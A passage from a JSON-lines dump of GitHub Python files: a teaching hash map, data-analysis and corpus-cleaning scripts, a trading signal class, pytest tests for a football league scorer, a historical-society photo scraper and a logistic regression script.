array_index = hash_code % self.array_size\n return array_index\n\n def assign(self, key, value):\n array_index = (self.compress(self.hash(key)))\n payload = Node([key, value])\n list_at_array = (self.array[array_index])\n\n for list in list_at_array:\n if(list[0]==key):\n list[1] = value\n return\n else:\n continue\n list_at_array.insert(payload)\n\n def retrieve(self, key):\n array_index = (self.compress(self.hash(key)))\n list_at_index = self.array[array_index]\n for list in list_at_index:\n if(list[0]==key):\n return list[1]\n else:\n continue\n return\n\nh = HashMap(5)\nprint(h.assign('apple', 'granny smith'))\nprint(h)\nprint(h.retrieve('apple'))\nprint(h.assign('apple', 'yummy'))\nprint(h.retrieve('apple'))\n\nflower_definitions = [['begonia', 'cautiousness'], ['chrysanthemum', 'cheerfulness'], ['carnation', 'memories'], ['daisy', 'innocence'], ['hyacinth', 'playfulness'], ['lavender', 'devotion'], ['magnolia', 'dignity'], ['morning glory', 'unrequited love'], ['periwinkle', 'new friendship'], ['poppy', 'rest'], ['rose', 'love'], ['snapdragon', 'grace'], ['sunflower', 'longevity'], ['wisteria', 'good luck']]\nblossom = HashMap(len(flower_definitions))\nfor flower in flower_definitions:\n blossom.assign(flower[0], flower[1])\n\nprint(blossom.retrieve('daisy'))\nflower_definitions.append(['dog','not cat'])\nprint(flower_definitions)","repo_name":"pattiestarfish/root","sub_path":"Python3 educational/data structures/hash tables and linked lists/blossom_hash_map.py","file_name":"blossom_hash_map.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17376584930","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n# @Time : 2022/1/25 10:31\n# @Author : RuanXinWei (https://github.com/Ruan-XinWei/)\n# @File : everyMonthCommentNum.py\n# @Software: PyCharm\nimport pandas as pd\n\nfrom BookAnalysis.analysis.base import Base\n\n\nclass Analysis(Base):\n def __init__(self, filename=None):\n if filename is None:\n filename = 'bookComment.csv'\n super().__init__(filename)\n\n def getData(self):\n df: pd.DataFrame = self.df.copy()\n df['time'] = pd.to_datetime(df['time'], errors='coerce')\n df = df.dropna(subset=['time'])\n df['Month'] = df['time'].dt.month\n df = df['Month']\n data = df.value_counts(sort=False)\n # print(df.resample('1M').sum())\n return {\n 'xAxis': data.index.tolist(),\n 'yAxis': data.values.tolist()\n }\n\n\nif __name__ == '__main__':\n print(Analysis().getData())","repo_name":"ruannxw/book-analysis","sub_path":"BookAnalysis/analysis/everyMonthCommentNum.py","file_name":"everyMonthCommentNum.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"74474598088","text":"import AbstractStrategy\n\nclass UsingSimpleMovingAverage(AbstractStrategy):\n \"\"\"\n Use simple moving average to calculate signals and make decision\n to buy, sell or do nothing on stock market.\n \"\"\"\n\n def __init__(self, samples_amount: int=2):\n # calculating average to make sens requires one sample\n # need to calculate two moving averages and API returns 10 samples,\n # so cannot have more than 9 samples in one moving average\n self.samples_amount = min(max(1, samples_amount), 9)\n\n def get_signal(self, exchanges):\n \"\"\"\n Implement simple moving average and return signal:\n 0 -> sell\n 1 -> do nothing\n 2 -> buy\n \"\"\"\n # first moving average\n fma = sum(exchanges[len(exchanges)-self.samples_amount-1:-1]) / self.samples_amount\n # second moving average\n sma = sum(exchanges[len(exchanges)-self.samples_amount:]) / self.samples_amount\n # one before last exchange\n prev_exchange = exchanges[-2]\n # last exchange\n last_exchange = exchanges[-1]\n\n if sma - fma >= 0 and last_exchange - prev_exchange >= 0:\n return 2\n if sma - fma <= 0 and last_exchange - prev_exchange < 0:\n return 0\n return 1","repo_name":"kuboszekadr/TradingBot","sub_path":"src/strategies/UsingSimpleMovingAverage.py","file_name":"UsingSimpleMovingAverage.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35278158332","text":"# This script prepare the data for the generic language model\n# It takes the swisstext and leipzig corpus and and create a train, valid,\n# and test set. Then it adds the twitter corpus to create another train,\n# valid, and test set.\n# Finally, it creates a test set using the whatsapp corpus.\n# All files are saved as .txt files.\n# The goal is to compare how generalizable the swisstext/leipzig corpus is\n# compared to a swisstext/leipzig/twitter corpus.\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport os\nfrom pathlib import Path\nfrom preprocessing.cleaner import *\nfrom tqdm import tqdm\nfrom phrasal.norm_punc import *\n\n### Settings #################################################################\nleipzig_path = \"data/leipzig_over_99.csv\"\nswisstext_path = \"data/swisscrawl_over_99.csv\"\ntwitter_path = \"data/twitter_over_99.csv\"\nwhatsapp_path = \"data/whatsapp_over_99.csv\"\noutput_dir_sl = \"data/swisstext_leipzig\"\noutput_dir_tsl = \"data/twitter_swisstext_leipzig\"\noutput_dir_whatsapp = \"data/whatsapp/\"\n################################################################################\n\n# regexs to remove urls, mentions, and hashtags\npreprocessing_regex = [('https?[\\w\\.\\:\\-\\/]*($|\\s)', ' '),\n ('www\\.[\\w\\.\\:\\-\\/]*($|\\s)', ' '),\n ('@\\S*($|\\s)', ' '),\n ('#\\S*($|\\s)', ' ')]\n\n# good characters set. Any sentence with characters not in this set will be\n# removed.\n\ndef remove_sentences_with_special_chars(sentences):\n chars_ok = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n chars_ok += \"ÀÁÂÄÈÉÊËÍÌÎÏÓÒÔÖÚÙÛÜàáâäèéêëìíîïôöòóüùúûÿ\"\n chars_ok += \" -,.?!0123456789%&\\\"\\'()/$*+:;<=>[]\\\\^_{}|\\\\~€°²#\"\n chars_ok = set(chars_ok)\n\n return [x for x in sentences if len(set(x).difference(chars_ok))==0]\n\ndef remove_sentences_with_special_words(sentences, max_char):\n \"\"\"Remove sentences with words containing too much special characters.\n \"\"\"\n\n chars_ok = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n chars_ok += \"ÀÁÂÄÈÉÊËÍÌÎÏÓÒÔÖÚÙÛÜàáâäèéêëìíîïôöòóüùúûÿ\"\n chars_ok += \"0123456789\"\n chars_ok = set(chars_ok)\n\n res = []\n for sentence in tqdm(sentences):\n words = sentence.split()\n ok = True\n for word in words:\n if len([c for c in word if c not in chars_ok]) > max_char:\n ok = False\n if ok:\n res.append(sentence)\n return res\n\n# load the datasets\ndf_leipzig = pd.read_csv(leipzig_path, header=None, sep=\"\\t\")\nleipzig_sentences = list(df_leipzig.iloc[:, 0])\nprint(f\"leipzig length : {len(leipzig_sentences)}\")\nleipzig_sentences = remove_sentences_with_special_chars(leipzig_sentences)\nleipzig_sentences = remove_sentences_with_special_words(leipzig_sentences, 3)\nprint(f\"leipzig filtered length : {len(leipzig_sentences)}\")\nprint(leipzig_sentences[0])\nprint(leipzig_sentences[-1])\n\ndf_swisstext = pd.read_csv(swisstext_path, header=None, sep=\"\\t\")\nswisstext_sentences = list(df_swisstext.iloc[:, 0])\nprint(f\"swisstext length : {len(swisstext_sentences)}\")\nswisstext_sentences = remove_sentences_with_special_chars(swisstext_sentences)\nswisstext_sentences = remove_sentences_with_special_words(swisstext_sentences, 3)\nprint(f\"swisstext filtered length : {len(swisstext_sentences)}\")\nprint(swisstext_sentences[0])\nprint(swisstext_sentences[-1])\n\ndf_twitter = pd.read_csv(twitter_path, header=None, sep=\"\\t\")\ntwitter_sentences = list(df_twitter.iloc[:, 0])\nprint(f\"twitter length : {len(twitter_sentences)}\")\ntwitter_sentences = remove_sentences_with_special_chars(twitter_sentences)\ntwitter_sentences = remove_sentences_with_special_words(twitter_sentences, 3)\nprint(f\"twitter filtered length : {len(twitter_sentences)}\")\nprint(twitter_sentences[0])\nprint(twitter_sentences[-1])\n\ndf_whatsapp = pd.read_csv(whatsapp_path, header=None, sep=\"\\t\")\nwhatsapp_sentences = list(df_whatsapp.iloc[:, 0])\nprint(f\"whatsapp length : {len(whatsapp_sentences)}\")\nwhatsapp_sentences = remove_sentences_with_special_chars(whatsapp_sentences)\nwhatsapp_sentences = remove_sentences_with_special_words(whatsapp_sentences, 3)\nprint(f\"whatsapp filtered length : {len(whatsapp_sentences)}\")\nprint(whatsapp_sentences[0])\nprint(whatsapp_sentences[-1])\n\n### cleaning ###\n\ndef clean_text(text):\n text = Cleaner.preprocess(text, preprocessing_regex)\n text = normalize_text(text, strip_emojis=True)\n text = Cleaner.remove_smileys(text)\n text = Cleaner.remove_hat_element(text)\n text = Cleaner.remove_html_entities(text)\n text = Cleaner.clean_punc(text)\n text = Cleaner.remove_groups_of_special_chars(text, 2)\n text = Cleaner.remove_special_duplication(text)\n text = Cleaner.remove_isolated_special_chars(text)\n return text\n\nleipzig_sentences = [clean_text(x) for x in tqdm(leipzig_sentences)]\nleipzig_sentences = [x for x in leipzig_sentences if len(x.split()) >= 5]\nprint(f\"leipzig final length : {len(leipzig_sentences)}\")\nswisstext_sentences = [clean_text(x) for x in tqdm(swisstext_sentences)]\nswisstext_sentences = [x for x in swisstext_sentences if len(x.split()) >= 5]\nprint(f\"swisstext final length : {len(swisstext_sentences)}\")\ntwitter_sentences = [clean_text(x) for x in tqdm(twitter_sentences)]\ntwitter_sentences = [x for x in twitter_sentences if len(x.split()) >= 5]\nprint(f\"twitter final length : {len(twitter_sentences)}\")\nwhatsapp_sentences = [clean_text(x) for x in tqdm(whatsapp_sentences)]\nwhatsapp_sentences = [x for x in whatsapp_sentences if len(x.split()) >= 5]\nprint(f\"whatsapp final length : {len(whatsapp_sentences)}\")\n\n### splitting into sets ###\n\ndef split_sets(sentences, train_proportion, valid_proportion):\n random.shuffle(sentences)\n first_break = train_proportion\n second_break = train_proportion + valid_proportion\n sets = np.split(sentences, [int(first_break*len(sentences)),\n int(second_break*len(sentences))])\n return [list(x) for x in sets]\n\nleipzig_sets = split_sets(leipzig_sentences, 0.8, 0.1)\nprint(\"Leipzig\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(leipzig_sets[i])}\")\nswisstext_sets = split_sets(swisstext_sentences, 0.8, 0.1)\nprint(\"Swisstext\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(swisstext_sets[i])}\")\ntwitter_sets = split_sets(twitter_sentences, 0.8, 0.1)\nprint(\"Twitter\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(twitter_sets[i])}\")\n\n### merging ###\n\nprint(\"Swisstext / Leipzig\")\nsl_sets = dict()\nsl_sets[\"train\"] = list(set(leipzig_sets[0] + swisstext_sets[0]))\nrandom.shuffle(sl_sets[\"train\"])\nprint(f\"Train : {len(sl_sets['train'])}\")\nsl_sets[\"valid\"] = list(set(leipzig_sets[1] + swisstext_sets[1]))\nrandom.shuffle(sl_sets[\"valid\"])\nprint(f\"Valid : {len(sl_sets['valid'])}\")\nsl_sets[\"test\"] = list(set(leipzig_sets[2] + swisstext_sets[2]))\nrandom.shuffle(sl_sets[\"test\"])\nprint(f\"Test : {len(sl_sets['test'])}\")\nsl_sets[\"test_20k\"] = sl_sets[\"test\"][:20000]\n\nprint(\"Twitter / Swisstext / Leipzig\")\ntsl_sets = dict()\ntsl_sets[\"train\"] = list(set(sl_sets[\"train\"] + twitter_sets[0]))\nrandom.shuffle(tsl_sets[\"train\"])\nprint(f\"Train : {len(tsl_sets['train'])}\")\ntsl_sets[\"valid\"] = list(set(sl_sets[\"valid\"] + twitter_sets[1]))\nrandom.shuffle(tsl_sets[\"valid\"])\nprint(f\"Valid : {len(tsl_sets['valid'])}\")\ntsl_sets[\"test\"] = list(set(sl_sets[\"test\"] + twitter_sets[2]))\nrandom.shuffle(tsl_sets[\"test\"])\nprint(f\"Test : {len(tsl_sets['test'])}\")\ntsl_sets[\"test_20k\"] = tsl_sets[\"test\"][:20000]\n\nprint(\"Whatsapp\")\nw_sentences = list(set(whatsapp_sentences))\nprint(f\"Full : {len(w_sentences)}\")\n\n### Saving on disk ###\n\nPath(output_dir_sl).mkdir(parents=True, exist_ok=True)\nPath(output_dir_tsl).mkdir(parents=True, exist_ok=True)\nPath(output_dir_whatsapp).mkdir(parents=True, exist_ok=True)\n\nfor name in [\"train\", \"valid\", \"test\", \"test_20k\"]:\n path = os.path.join(output_dir_sl, name + \".csv\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write('\\n'.join(sl_sets[name]) + '\\n')\n\nfor name in [\"train\", \"valid\", \"test\", \"test_20k\"]:\n path = os.path.join(output_dir_tsl, name + \".csv\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write('\\n'.join(tsl_sets[name]) + '\\n')\n\npath = os.path.join(output_dir_whatsapp, \"full.csv\")\nwith open(path, \"w\", encoding=\"utf8\") as f:\n f.write('\\n'.join(w_sentences) + '\\n')\n","repo_name":"Karexar/gsw_language_model","sub_path":"preprocessing/generic/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8539770846","text":"from . import Plugin\n\n\nclass SqsPlugin(Plugin):\n targets = [\n {\n 'match': '^servers\\.(?P[^\\.]+)\\.sqs\\.(?P[^\\.]+)\\.(?P[^\\.]+)\\.(?PApproximateNumberOfMessages.*)$',\n 'target_type': 'gauge',\n 'tags': {'unit': 'Msg'}\n }\n ]\n\n# vim: ts=4 et sw=4:\n","repo_name":"vimeo/graph-explorer","sub_path":"graph_explorer/structured_metrics/plugins/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1063,"dataset":"github-code","pt":"16"} +{"seq_id":"22476558714","text":"import pytest\nfrom classes.League import League\nfrom classes.Team import Team\nfrom classes.Match import Match\nimport utilities.constants as const\nimport datetime\nimport utilities.util as util\n\ndef getMockLeagueForFindTeamTests():\n mockLeague = League(\"testName\",\"testCountry\")\n mockLeague.teams.append(Team(\"name1\",\"player1\"))\n mockLeague.teams.append(Team(\"name2\",\"player2\"))\n mockLeague.teams.append(Team(\"name3\",\"player3\"))\n mockLeague.teams.append(Team(\"name4\",\"player4\"))\n mockLeague.teams.append(Team(\"name5\",\"player5\"))\n return mockLeague\n\ndef test_filterMatches_filters_matches_not_involving_player_teams():\n myLeague = League(\"league1\",\"country1\")\n \n match1 = Match()\n match1.awayTeam = \"team1\"\n match1.homeTeam = \"team2\"\n \n match2 = Match()\n match2.awayTeam = \"team3\"\n match2.homeTeam = \"not a real team\"\n \n match3 = Match()\n match3.awayTeam = \"teamNo\"\n match3.homeTeam = \"team2\"\n \n match4 = Match()\n match4.awayTeam = \"noTeam\"\n match4.homeTeam = \"nah\"\n \n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n team3 = Team(\"team3\",\"player3\")\n \n myLeague.matches.extend([match1,match2,match3,match4])\n myLeague.teams.extend([team1,team2,team3]) \n \n myLeague.filterMatches()\n assert len(myLeague.matches) == 3\n assert myLeague.matches == [match1,match2,match3]\n\ndef test_calculatePointsForMatches_calculates_points_correctly():\n myLeague = League(\"league1\",\"country1\")\n match1 = Match(None,\"team1\",1,\"team2\",1)\n match1.homeTeamIsPlayerTeam = True\n match1.awayTeamIsPlayerTeam = True\n\n match2 = Match(None,\"team3\",4,\"team4\",2)\n match2.homeTeamIsPlayerTeam = True\n match2.awayTeamIsPlayerTeam = False\n \n match3 = Match(None,\"team5\",3,\"team6\",0)\n match3.homeTeamIsPlayerTeam = False\n match3.awayTeamIsPlayerTeam = True\n\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n team3 = Team(\"team3\",\"player3\")\n \n myLeague.matches.extend([match1,match2,match3])\n myLeague.teams.extend([team1,team2,team3])\n \n myLeague.calculatePointsForMatches()\n assert match1.points == 10 #draw (5) with multiplier (5*2)\n assert match2.points == 0\n assert match3.points == 20\n\ndef test_calculatePointsForMatches_calculates_bonus_points_correctly_for_4_goal_win_rule():\n const.FOUR_GOAL_WIN_RULE = True\n myLeague = League(\"league1\",\"country1\")\n match1 = Match(None,\"team1\",4,\"team2\",0)\n match1.homeTeamIsPlayerTeam = True\n match1.awayTeamIsPlayerTeam = True\n\n match2 = Match(None,\"germany\",7,\"brazil\",1)\n match2.homeTeamIsPlayerTeam = True\n match2.awayTeamIsPlayerTeam = False\n \n match3 = Match(None,\"team6\",0,\"team3\",3)\n match3.homeTeamIsPlayerTeam = False\n match3.awayTeamIsPlayerTeam = True\n\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n germany = Team(\"germany\",\"player3\")\n team3 = Team(\"team3\",\"player4\")\n brazil = Team(\"brazil\",\"player5\")\n team6 = Team(\"team6\",\"player6\")\n \n myLeague.matches.extend([match1,match2,match3])\n myLeague.teams.extend([team1,germany,team3,team2,brazil,team6])\n \n myLeague.calculatePointsForMatches()\n assert match1.bonusPoints == -10 #\n assert match2.bonusPoints == -10\n assert match3.bonusPoints == 0\n\n\n\ndef test_applyMatchMultipliers_applies_no_multipliers_if_only_1_teams_is_a_player_team():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",None)\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = False\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 20\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_both_teams_of_same_player():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player1\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 0\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_both_teams_of_different_player():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_draw_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.draw = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 5\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 10\n \ndef test_applyMatchMultipliers_applies_correct_multiplier_for_away_win_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = False\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40\n\ndef test_applyMatchMultipliers_applies_correct_multiplier_for_home_win_for_superliga_slutspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,4,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 20 \n \ndef test_applyMatchMultipliers_applies_correct_multiplier_for_home_win_for_superliga_grundspil():\n myLeague = League(\"league1\",\"country1\")\n myLeague.name = \"superliga\"\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsWinner = True\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.date = datetime.date(datetime.datetime.now().year,3,15)\n newMatch.points = 20\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 40 \n \ndef test_applyMatchMultipliers_applies_correct_multiplier_with_changed_INDBYRDES_MULTIPLIER_constant():\n myLeague = League(\"league1\",\"country1\")\n \n newMatch = Match()\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n newMatch.homeTeam = \"team1\"\n newMatch.awayTeam = \"team2\"\n newMatch.homeTeamIsPlayerTeam = True\n newMatch.awayTeamIsPlayerTeam = True\n newMatch.points = 30\n \n const.INDBYRDES_MULTIPLIER = 3\n \n myLeague.teams.append(team1)\n myLeague.teams.append(team2)\n \n myLeague.applyMatchMultipliers(newMatch) \n assert newMatch.points == 90\n\ndef test_findTeamByTeamName_finds_team_if_it_is_there():\n mockLeague = getMockLeagueForFindTeamTests()\n newTeam = Team(\"newName\",\"newPlayer\")\n mockLeague.teams.append(newTeam)\n assert util.findTeamByTeamName(mockLeague.teams,newTeam.name) == newTeam\n \ndef test_findTeamByTeamName_raises_exception_if_team_is_not_there():\n mockLeague = getMockLeagueForFindTeamTests()\n newTeamNotThere = Team(\"raise\",\"exception\")\n with pytest.raises(Exception):\n util.findTeamByTeamName(mockLeague.teams,newTeamNotThere.name) == newTeamNotThere\n","repo_name":"Lildhansen/FerieKasse","sub_path":"Testing/league_test.py","file_name":"league_test.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39682947347","text":"import requests\r\nfrom lxml import etree\r\nimport json\r\nimport pdb\r\nimport re\r\nfrom base import *\r\n\r\n\r\nclass Search_mnhs_org:\r\n name = 'search_mnhs_org'\r\n base_url = 'https://search.mnhs.org'\r\n\r\n def __init__(self):\r\n self.db, self.cursor = connect_mysql_db()\r\n self.session = requests.Session()\r\n self.headers = {\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n 'Cookie': '_ga=GA1.2.2127827836.1615311398; _gid=GA1.2.1680323628.1615422977; _gat=1',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36',\r\n }\r\n self.start_requests()\r\n \r\n def start_requests(self):\r\n try:\r\n page_num = 1\r\n while True:\r\n url = f'https://search.mnhs.org/index.php?collection[]=mn_mhs-cms&subject[]=Residences&count=100&startindex={page_num}'\r\n response = self.session.get(url, headers=self.headers)\r\n tree = etree.HTML(response.text)\r\n collections = tree.xpath('//div[@id=\"main-content\"]//span[@class=\"list_right\"]//strong[@class=\"item-title\"]//a')\r\n if collections == []:\r\n break \r\n for collection in collections:\r\n c_url = validate(collection.xpath('./@href'))\r\n self.parse_collection(c_url)\r\n page_num += 100\r\n except Exception as e:\r\n print(e)\r\n \r\n def parse_collection(self, c_url):\r\n try:\r\n c_response = self.session.get(c_url, headers=self.headers)\r\n c_tree = etree.HTML(c_response.text)\r\n data = {}\r\n fields = c_tree.xpath('.//table[@id=\"itemTable\"]//tr')\r\n for field in fields:\r\n key = validate(field.xpath('.//th//text()')).lower()\r\n value = validate(field.xpath('.//td//text()'))\r\n if key == 'description':\r\n data['caption'] = value\r\n if key == 'subjects':\r\n data['subject'] = value\r\n if key == 'dates':\r\n years = re.findall('(\\d{4})', value)\r\n if len(years) > 0:\r\n data['year_built'] = years[0]\r\n if key == 'creation':\r\n data['photo_publisher'] = eliminate_space(value.split(':'))[-1]\r\n if key == 'places':\r\n values = field.xpath('.//td//text()')\r\n try:\r\n addrs = values[0].split(':')[-1].split(', ')\r\n if len(addrs) == 5:\r\n addr, data['city'], data['county'], data['state'], country = addrs\r\n if 'neighborhood' in addr.lower():\r\n data['neighborhood'] = addr\r\n else:\r\n data['street_address'] = addr\r\n else:\r\n try:\r\n data['city'], data['county'], data['state'], country = addrs\r\n except:\r\n pass\r\n except:\r\n pass\r\n\r\n data['source'] = 'Search the Minnesota Historical Society'\r\n data['source_url'] = c_url\r\n c_id = c_url.split('?irn=')[1].split('&')[0]\r\n data['uuid'] = generate_uuid(f\"mnhs_{c_id}\")\r\n thumbnail_url = validate(c_tree.xpath('.//div[@class=\"item-group\"]//img/@src'))\r\n if thumbnail_url != '':\r\n data['thumbnail_url'] = f'http://collections.mnhs.org/cms/{thumbnail_url}'\r\n data['photo_url'] = data['thumbnail_url'].replace('&kind=thumbnail', '')\r\n data['photo_location'] = f\"photos/{self.name}/{c_id}.jpg\"\r\n download_photo(self.session, data['photo_url'], {}, f\"photos/{self.name}\", data['photo_location'])\r\n insert_data_into_mysql_db(self.db, self.cursor, data)\r\n except Exception as e:\r\n print(e)\r\n\r\nif __name__ == '__main__':\r\n Search_mnhs_org()\r\n","repo_name":"coralisland-git/house-novel-scraper","sub_path":"search_mnhs_org.py","file_name":"search_mnhs_org.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14794306077","text":"class loop_tracker:\n BLANK = object()\n\n def __init__(self, iterable):\n self.iterable = iter(iterable)\n self.empty_accesses = self.size = 0\n self._cache = self._first = self._last = self.BLANK\n\n def __iter__(self):\n return self\n\n def __len__(self):\n return self.size\n\n def __next__(self):\n item = self._access()\n if item is self.BLANK:\n self.empty_accesses += 1\n raise StopIteration\n self.size += 1\n self._last = item\n self._cache = self.BLANK\n return item\n\n def _access(self):\n if self._cache is self.BLANK:\n if self._first is self.BLANK:\n self._cache = self._first = next(self.iterable, self.BLANK)\n else:\n self._cache = next(self.iterable, self.BLANK)\n return self._cache\n\n def is_empty(self):\n if self._access() is self.BLANK:\n return True\n return False\n\n @property\n def last(self):\n if self._last is self.BLANK:\n raise AttributeError(f'{self.__name__} iterator has not been accessed so it has no last attribute')\n return self._last\n\n @property\n def first(self):\n self._access()\n if self._first is self.BLANK:\n raise AttributeError(f'{self.__name__} iterable does not have a first attribute') from None\n return self._first\n","repo_name":"ryanh153/Morsels","sub_path":"53_78/62_loop_tracker/loop_tracker.py","file_name":"loop_tracker.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33971612071","text":"from copy import deepcopy\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sn\r\nfrom sklearn import preprocessing\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\n# Build the One vs All matrix using the infrastructures that created.\r\ndef build_oneVSall_matrix(LR_Models, x_test, y_test):\r\n probability_of_Xi = np.zeros(len(LR_Models))\r\n confusion_matrix = np.zeros((len(LR_Models), len(LR_Models)))\r\n for j in range(0, x_test.shape[0]):\r\n for i in range(0, len(LR_Models)):\r\n probability_of_Xi[i] = (LR_Models[i].predict_proba([x_test[j]]))[0][1]\r\n best_prob_index = np.argmax(probability_of_Xi)\r\n confusion_matrix[y_test[j] - 1][best_prob_index] += 1\r\n sn.heatmap(confusion_matrix, annot=True, xticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'),\r\n yticklabels=('car', 'fad', 'mas', 'gla', 'con', 'adi'))\r\n accuracy = 0\r\n for i in range(6):\r\n accuracy += confusion_matrix[i][i]\r\n accuracy = accuracy / len(x_test)\r\n print('One vs All Accuracy: ', accuracy)\r\n plt.xlabel('Predict')\r\n plt.ylabel('Actual')\r\n plt.title('One vs All')\r\n plt.show()\r\n\r\n\r\n# Setup the infrastructures for the One vs All LR method\r\ndef setupLRsOneVsAll(x_train, y_train):\r\n logistic_regression_for_car = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_fad = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_mas = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_gla = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_con = LogisticRegression(max_iter=1000, class_weight='balanced')\r\n logistic_regression_for_adi = 